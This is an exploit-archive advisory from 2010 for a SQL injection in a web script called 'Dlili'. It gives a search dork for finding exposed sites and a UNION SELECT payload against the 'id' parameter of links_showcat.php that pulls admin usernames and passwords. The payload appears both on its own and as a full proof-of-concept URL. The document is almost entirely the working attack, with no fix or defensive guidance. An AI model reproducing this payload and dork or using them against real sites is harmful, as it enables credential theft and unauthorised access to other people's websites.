[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : Dlili Script SQL Injection Vulnerability
# Published : 2010-02-02
# Author : Dr.DaShEr
# Previous Title : GCP 2.0 datasets provided as BioCASE web services
# Next Title : MYRE Classified (cat) SQL Injection Vulnerability


==============================================================================
                  Remote SQL Injection Vulnerability
  ==============================================================================
    [+] Published:           [2010-02-02]
    [+] Script:              [ dlili ]
    [+] Script site:         [ http://www.dlili.com ]
    [+] Author:              {Dr.DaShEr> Nyo@hotmail.com < ]
    [+] Gr44tz to:           [NeX HackEr & XP10_hacker]
  ########################################################################


   [+] Dork: inurl:"links_showcat.php?"


   =[ Exploit ]=

   [+] links_showcat.php?id=2 and 1=0 UNION SELECT 1,concat(username,0x3a,password),3,4 from admin


   [-] SQLi p0c:

   [+] http://server[path]/links_showcat.php?id=2 and 1=0 UNION SELECT 1,concat(username,0x3a,password),3,4 from admin


  ###########################################################################